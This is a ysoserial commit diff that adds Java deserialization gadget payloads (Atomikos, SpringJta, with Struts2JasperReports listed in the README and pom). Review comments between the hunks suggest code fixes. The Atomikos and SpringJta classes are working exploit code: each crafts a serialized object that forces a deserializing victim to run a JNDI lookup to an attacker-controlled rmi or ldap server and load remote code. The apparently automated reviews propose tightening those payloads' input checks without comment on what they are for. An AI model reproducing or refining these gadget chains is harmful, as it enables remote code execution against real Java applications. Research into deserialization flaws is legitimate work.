
Commit 02e2500

authored
New gadgets (Struts2JasperReports - Atomikos - SpringJta) (#123)
* added Atomikos gadget payload * added Atomikos gadget payload * naming * added spring-jta gadget * added strutsJasperReports gadget + tests * updated deps list on springJta * fixed authors * renaming
1 parent 9c448b5 commit 02e2500


8 files changed

+384
-41
lines changed


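--- a/README.md
+++ b/README.md
@@ -43,44 +43,46 @@ are not responsible or liable for misuse of the software. Use responsibly.
 ```shell
 $ java -jar ysoserial.jar
 Y SO SERIAL?
-Usage: java -jar ysoserial.jar [payload] '[command]'
+Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
 Available payload types:
-Payload Authors Dependencies
-------- ------- ------------
-AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
-BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
-C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
-Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
-Clojure @JackOfMostTrades clojure:1.8.0
-CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
-CommonsCollections1 @frohoff commons-collections:3.1
-CommonsCollections2 @frohoff commons-collections4:4.0
-CommonsCollections3 @frohoff commons-collections:3.1
-CommonsCollections4 @frohoff commons-collections4:4.0
-CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
-CommonsCollections6 @matthias_kaiser commons-collections:3.1
-CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
-FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
-Groovy1 @frohoff groovy:2.3.9
-Hibernate1 @mbechler
-Hibernate2 @mbechler
-JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
-JRMPClient @mbechler
-JRMPListener @mbechler
-JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
-JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
-Jdk7u21 @frohoff
-Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
-MozillaRhino1 @matthias_kaiser js:1.7R2
-MozillaRhino2 @_tint0 js:1.7R2
-Myfaces1 @mbechler
-Myfaces2 @mbechler
-ROME @mbechler rome:1.0
-Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
-Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
-URLDNS @gebl
-Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
-Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
+Payload Authors Dependencies
+------- ------- ------------
+Atomikos @pwntester, @sciccone transactions-osgi:4.0.6, jta:1.1
+BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
+C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
+Clojure @JackOfMostTrades clojure:1.8.0
+CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
+CommonsCollections1 @frohoff commons-collections:3.1
+CommonsCollections2 @frohoff commons-collections4:4.0
+CommonsCollections3 @frohoff commons-collections:3.1
+CommonsCollections4 @frohoff commons-collections4:4.0
+CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
+CommonsCollections6 @matthias_kaiser commons-collections:3.1
+CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
+FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
+Groovy1 @frohoff groovy:2.3.9
+Hibernate1 @mbechler
+Hibernate2 @mbechler
+JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
+JRMPClient @mbechler
+JRMPListener @mbechler
+JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
+JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
+Jdk7u21 @frohoff
+Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
+MozillaRhino1 @matthias_kaiser js:1.7R2
+MozillaRhino2 @_tint0 js:1.7R2
+Myfaces1 @mbechler
+Myfaces2 @mbechler
+ROME @mbechler rome:1.0
+Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
+Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
+SpringJta @zerothoughts, @sciccone spring-tx:5.1.7.RELEASE, spring-context:5.1.7.RELEASE, jta:1.1
+Struts2JasperReports @sciccone struts2-core:2.5.20, struts2-jasperreports-plugin:2.5.20
+URLDNS @gebl
+Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
+Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
+
 ```
 
 ## Examples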

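--- a/pom.xml
+++ b/pom.xml
@@ -277,9 +277,9 @@
 <version>1.7R2</version>
 </dependency>
 <dependency>
-<groupId>javassist</groupId>
-<artifactId>javassist</artifactId>
-<version>3.12.0.GA</version>
+<groupId>javassist</groupId>
+<artifactId>javassist</artifactId>
+<version>3.12.0.GA</version>
 </dependency>
 <dependency>
 <groupId>org.jboss.weld</groupId>
@@ -326,6 +326,32 @@
 <artifactId>vaadin-server</artifactId>
 <version>7.7.14</version>
 </dependency>
+<dependency>
+<groupId>com.atomikos</groupId>
+<artifactId>transactions-osgi</artifactId>
+<version>4.0.6</version>
+</dependency>
+<dependency>
+<groupId>org.springframework</groupId>
+<artifactId>spring-tx</artifactId>
+<version>5.1.7.RELEASE</version>
+</dependency>
+<dependency>
+<groupId>org.springframework</groupId>
+<artifactId>spring-context</artifactId>
+<version>5.1.7.RELEASE</version>
+</dependency>
+<dependency>
+<groupId>org.apache.struts</groupId>
+<artifactId>struts2-core</artifactId>
+<version>2.5.20</version>
+</dependency>
+<dependency>
+<groupId>org.apache.struts</groupId>
+<artifactId>struts2-jasperreports-plugin</artifactId>
+<version>2.5.20</version>
+</dependency>
+
 <dependency>
 <groupId>org.aspectj</groupId>
 <artifactId>aspectjweaver</artifactId>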
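Review bot: The dependency block added after the `vaadin-server` entry matches the three new README rows (transactions-osgi 4.0.6, spring-tx/spring-context 5.1.7.RELEASE, struts2-core and struts2-jasperreports-plugin 2.5.20), but the README table regenerated in this same commit also drops the AspectJWeaver and Click1 rows while `aspectjweaver` is still declared immediately below this hunk, so the documented payload list and the build no longer agree. The commit message does not mention removing those payloads, which suggests the table was regenerated from a build that did not include them; regenerating the README from a full build, or restoring the two rows, would keep the list and this pom in step. The new entries carry no `<scope>` or `<optional>` flag, which is consistent with the surrounding gadget-library entries such as `vaadin-server` and `aspectjweaver`. The javassist hunk above appears to be whitespace-only (the removed and added lines are identical as rendered) and needs no review.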
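--- /dev/null
+++ b/ysoserial/payloads/Atomikos.java
@@ -0,0 +1,77 @@
+package ysoserial.payloads;
+
+import javax.management.BadAttributeValueExpException;
+
+import com.atomikos.icatch.jta.RemoteClientUserTransaction;
+
+import ysoserial.payloads.annotation.Authors;
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.annotation.PayloadTest;
+import ysoserial.payloads.util.PayloadRunner;
+import ysoserial.payloads.util.Reflections;
+
+/**
+*
+* Gadget chain:
+*
+* javax/management/BadAttributeValueExpException.readObject()
+* com/atomikos/icatch/jta/RemoteClientUserTransaction.toString()
+* com/atomikos/icatch/jta/RemoteClientUserTransaction.checkSetup()
+* javax/naming/InitialContext.lookup()
+*
+*
+* Arguments:
+* - (rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>
+*
+*
+* @author pwntester
+* payload added by sciccone
+*
+* This gadget chain was also discovered by pwntester:
+* https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
+*
+*/
+@PayloadTest(harness="ysoserial.test.payloads.JRMPReverseConnectTest")
+@Dependencies( { "com.atomikos:transactions-osgi:4.0.6", "javax.transaction:jta:1.1" } )
+@Authors({ Authors.PWNTESTER, Authors.SCICCONE })
+public class Atomikos implements ObjectPayload<Object> {
+
+@Override
+public Object getObject(String command) throws Exception {
+
+// validate command
+int sep = command.lastIndexOf('/');
+if ( sep < 0 || (!command.startsWith("ldap") && !command.startsWith("rmi")))
+throw new IllegalArgumentException("Command format is: " + command
++ "(rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>");
+
+String url = command.substring(0, sep);
+String className = command.substring(sep + 1);
+
+// create factory based on url
+String initialContextFactory;
+if (url.startsWith("ldap"))
+initialContextFactory = "com.sun.jndi.ldap.LdapCtxFactory";
+else
+initialContextFactory = "com.sun.jndi.rmi.registry.RegistryContextFactory";
+
+// create object
+RemoteClientUserTransaction rcut = new RemoteClientUserTransaction();
+
+// set values using reflection
+Reflections.setFieldValue(rcut, "initialContextFactory", initialContextFactory);
+Reflections.setFieldValue(rcut, "providerUrl", url);
+Reflections.setFieldValue(rcut, "userTransactionServerLookupName", className);
+
+// create exception
+BadAttributeValueExpException exception = new BadAttributeValueExpException(null);
+Reflections.setFieldValue(exception, "val", rcut);
+
+return exception;
+}
+
+
+public static void main ( final String[] args ) throws Exception {
+PayloadRunner.run(Atomikos.class, args);
+}
+}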
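Review bot: The argument check built on `int sep = command.lastIndexOf('/')` accepts `rmi://host` (no lookup name), because the last `/` is then the one inside `://`, and the following `substring` calls silently produce `url = "rmi:/"` and `className = "host"`; `rmi://host/` likewise passes with an empty class name, and the prefix test `startsWith("ldap")`/`startsWith("rmi")` admits any string beginning with those letters. Since the JNDI lookup only fires in `readObject()` on the deserializing side, this check is the only place a malformed argument can be rejected before it is baked into the serialized object, so it should require the full `ldap://`/`rmi://` prefix (as SpringJta in the same commit already does), a `/` after the host and a non-empty name. The exception message also concatenates the offending command directly onto the format text (`Command format is: foo(rmi,ldap)://…`), which reads as if `foo` were part of the format; moving the value after the format fixes that. The three `Reflections.setFieldValue` calls target private field names of `RemoteClientUserTransaction`, which presumably ties the payload to the transactions-osgi 4.0.6 layout; a one-line comment such as `// field names taken from com.atomikos transactions-osgi 4.0.6; verify before bumping the version` would save the next maintainer a debugging session.
```java
// validate command
int sep = command.lastIndexOf('/');
boolean hasScheme = command.startsWith("ldap://") || command.startsWith("rmi://");
if (!hasScheme || sep < command.indexOf("://") + 3 || sep == command.length() - 1)
    throw new IllegalArgumentException(
        "Command format is: (rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>, got: " + command);
// … unchanged: url/className split, factory selection, reflection setup, exception wrapping …
```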
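--- /dev/null
+++ b/ysoserial/payloads/SpringJta.java
@@ -0,0 +1,74 @@
+package ysoserial.payloads;
+
+import org.springframework.transaction.jta.JtaTransactionManager;
+
+import ysoserial.payloads.annotation.Authors;
+import ysoserial.payloads.annotation.Dependencies;
+import ysoserial.payloads.annotation.PayloadTest;
+import ysoserial.payloads.util.PayloadRunner;
+
+/**
+*
+* Gadget chain:
+*
+* org.springframework.transaction.jta.JtaTransactionManager.readObject()
+* org.springframework.transaction.jta.JtaTransactionManager.initUserTransactionAndTransactionManager()
+* org.springframework.transaction.jta.JtaTransactionManager.lookupUserTransaction()
+* org.springframework.jndi.JndiTemplate.lookup()
+* javax.naming.InitialContext.lookup()
+*
+*
+* Arguments:
+* - (rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>
+*
+*
+* @author zerothoughts
+* payload added by sciccone
+*
+* This gadget was discovered by zerothoughts:
+* https://github.com/zerothoughts/spring-jndi
+*
+*/
+@PayloadTest(harness="ysoserial.test.payloads.JRMPReverseConnectTest")
+@Dependencies( {
+"org.springframework:spring-tx:5.1.7.RELEASE",
+"org.springframework:spring-context:5.1.7.RELEASE",
+"javax.transaction:jta:1.1"
+} )
+@Authors({ Authors.ZEROTHOUGHTS, Authors.SCICCONE })
+public class SpringJta implements ObjectPayload<Object>, DynamicDependencies {
+
+@Override
+public Object getObject(String command) throws Exception {
+
+// validate command
+if ( !(command.startsWith("ldap://") || command.startsWith("rmi://")) )
+throw new IllegalArgumentException("Command format is: "
++ "(rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>");
+
+// create object
+JtaTransactionManager jta = new JtaTransactionManager();
+jta.setUserTransactionName(command);
+
+return jta;
+}
+
+
+public static void main ( final String[] args ) throws Exception {
+PayloadRunner.run(SpringJta.class, args);
+}
+
+
+// add dependencies for testing
+public static String[] getDependencies () {
+return new String[] {
+"org.springframework:spring-tx:5.1.7.RELEASE",
+"org.springframework:spring-context:5.1.7.RELEASE",
+"org.springframework:spring-beans:5.1.7.RELEASE",
+"org.springframework:spring-core:5.1.7.RELEASE",
+"commons-logging:commons-logging:1.2",
+"javax.transaction:jta:1.1"
+};
+
+}
+}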
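Review bot: The check on the `if ( !(command.startsWith("ldap://") || command.startsWith("rmi://")) )` line only inspects the scheme, so a bare `rmi://` or `rmi://host` with no lookup name passes validation and is handed straight to `setUserTransactionName`; because the JNDI lookup only happens inside `readObject()` on the deserializing side, this is the one place a malformed argument can be rejected, and the error message (unlike Atomikos in the same commit) does not echo the offending value. A single pattern check covers scheme, host, optional port and a non-empty name: `if (!command.matches("(ldap|rmi)://[^/]+/.+")) throw new IllegalArgumentException("Command format is: (rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>, got: " + command);`. Separately, `getDependencies()` repeats the three `@Dependencies` coordinates and adds spring-beans, spring-core and commons-logging, and the `// add dependencies for testing` comment does not say why the two lists differ; I would replace it with `// classpath for the test harness: the @Dependencies artifacts plus spring-beans, spring-core and commons-logging, which the annotation does not list`. Since the two lists will drift on the next version bump, each coordinate could be declared once as a `private static final String` constant and referenced from both the annotation (compile-time constants are allowed there) and the array; how `DynamicDependencies` consumes a static `getDependencies()` is not visible here, so that part is presumably resolved reflectively by the test runner.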
